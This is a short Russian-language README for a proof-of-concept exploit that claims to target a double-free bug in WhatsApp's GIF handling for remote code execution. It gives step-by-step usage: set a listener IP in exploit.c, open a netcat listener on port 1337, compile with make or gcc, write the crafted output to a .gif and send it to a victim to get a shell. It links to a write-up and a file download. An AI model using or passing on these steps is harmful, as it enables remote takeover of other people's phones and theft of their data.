
Эксплойт, подтверждающий концепцию, для CVE-2020-11932 — уязвимость двойного освобождения памяти в обработке GIF в WhatsApp, что позволяет удаленно выполнять код с помощью специально созданного .gif файла.
Ошибка Double-Free в эксплойте WhatsApp, poc.
#Примечание: Убедитесь, что вы установили IP слушателя в exploit.c, чтобы получить шелл.
nc -lvp 1337 или любой другой порт.
и затем скомпилируйте.
make
или
gcc -o exploit egif_lib.c exploit.c
затем запустите ./exploit и сохраните содержимое в .gif
и отправьте жертве.
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
https://drive.google.com/file/d/1XP7K5zkKEhmbEONvRpjrkTQ5pwpBc6G_/view?usp=sharing